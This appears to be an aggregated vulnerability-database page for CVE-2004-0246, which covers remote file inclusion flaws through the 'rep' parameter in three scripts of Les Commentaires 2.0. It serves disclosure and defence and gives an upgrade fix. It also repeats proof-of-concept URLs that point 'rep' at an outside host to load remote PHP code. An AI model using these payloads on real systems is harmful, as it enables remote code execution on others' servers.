CVE-2004-0246
CVSS 10.0
Published: 2004-11-23 00:00:00
Last modified: 2016-10-17 22:42:22

[Original] Multiple PHP remote file inclusion vulnerabilities in (1) fonctions.lib.php, (2) derniers_commentaires.php, and (3) admin.php in Les Commentaires 2.0 allow remote attackers to execute arbitrary PHP code via the rep parameter.


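[CNNVD] Laurent Adda Les Commentaires PHP Multiple Module Script File Inclusion Vulnerability (CNNVD-200411-164)

        Les Commentaires 2.0 contains multiple PHP remote file inclusion vulnerabilities in (1) fonctions.lib.php, (2) derniers_commentaires.php, and (3) admin.php; a remote attacker can execute arbitrary PHP code via the rep parameter.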

- CVSS (base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

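- CPE (affected platforms and products)

Product and version information (CPE) is not currently available

- OVAL (technical details for detection)

No related OVAL definition found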

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0246
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0246
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-164
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=107584083719763&w=2
(UNKNOWN)  BUGTRAQ  20040203 Les Commentaires (PHP) Include file
http://www.securityfocus.com/bid/9536
(VENDOR_ADVISORY)  BID  9536
http://xforce.iss.net/xforce/xfdb/15010
(VENDOR_ADVISORY)  XF  lescommentaires-multiple-file-include(15010)

- Vulnerability information

Laurent Adda Les Commentaires PHP Multiple Module Script File Inclusion Vulnerability
Critical Input validation
2004-11-23 00:00:00 2005-10-20 00:00:00
Remote
        Les Commentaires 2.0 contains multiple PHP remote file inclusion vulnerabilities in (1) fonctions.lib.php, (2) derniers_commentaires.php, and (3) admin.php; a remote attacker can execute arbitrary PHP code via the rep parameter.

- Advisories and patches

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Vulnerability information (23619)

Laurent Adda Les Commentaires 2.0 PHP Script fonctions.lib.php Remote File Inclusion (EDBID:23619)
php webapps
2004-01-30 Verified
0 Himeur Nourredine
N/A [Click to download]
source: http://www.securityfocus.com/bid/9536/info

It has been reported that Les Commentaires may be prone to a file include vulnerability in various modules, that may allow an attacker to include malicious external files containing arbitrary PHP code to be executed on a vulnerable system.

All versions of Les Commentaires have been reported to be prone to this issue.

http://www.example.com/config/fonctions.lib.php?rep=http://www.example.com/		

- Vulnerability information (23620)

Laurent Adda Les Commentaires 2.0 PHP Script derniers_commentaires.php Remote File Inclusion (EDBID:23620)
php webapps
2004-01-30 Verified
0 Himeur Nourredine
N/A [Click to download]
source: http://www.securityfocus.com/bid/9536/info
 
It has been reported that Les Commentaires may be prone to a file include vulnerability in various modules, that may allow an attacker to include malicious external files containing arbitrary PHP code to be executed on a vulnerable system.
 
All versions of Les Commentaires have been reported to be prone to this issue.

http://www.example.com/derniers_commentaires.php?rep=http://www.example.com/		

- Vulnerability information (23621)

Laurent Adda Les Commentaires 2.0 PHP Script admin.php Remote File Inclusion (EDBID:23621)
php webapps
2004-01-30 Verified
0 Himeur Nourredine
N/A [Click to download]
source: http://www.securityfocus.com/bid/9536/info
  
It has been reported that Les Commentaires may be prone to a file include vulnerability in various modules, that may allow an attacker to include malicious external files containing arbitrary PHP code to be executed on a vulnerable system.
  
All versions of Les Commentaires have been reported to be prone to this issue.

http://www.example.com/admin.php?rep=http://www.example.com/		

- Vulnerability information

15990
Les Commentaires derniers_commentaires.php Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

Les Commentaires contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'derniers_commentaires.php' not properly sanitizing user input supplied to the 'rep' variable. This may allow a remote attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- Timeline

2004-02-03 Unknown
2004-02-03 Unknown

- Solution

Upgrade to version Les Commentaires 2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

- Vulnerability information

Laurent Adda Les Commentaires PHP Script Multiple Module File Include Vulnerability
Input Validation Error 9536
Yes No
2004-01-30 12:00:00 2009-07-12 02:06:00
The disclosure of this issue has been credited to Himeur Nourredine <lostnoobs@security-challenge.com>.

- Affected program versions

Laurent Adda Les Commentaires 2.0

- Vulnerability discussion

It has been reported that Les Commentaires may be prone to a file include vulnerability in various modules, that may allow an attacker to include malicious external files containing arbitrary PHP code to be executed on a vulnerable system.

All versions of Les Commentaires have been reported to be prone to this issue.

- Exploit

No exploit is required.

The following proof of concept has been supplied:
http://www.example.com/config/fonctions.lib.php?rep=http://www.example.com/
http://www.example.com/derniers_commentaires.php?rep=http://www.example.com/
http://www.example.com/admin.php?rep=http://www.example.com/

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related references

 

 
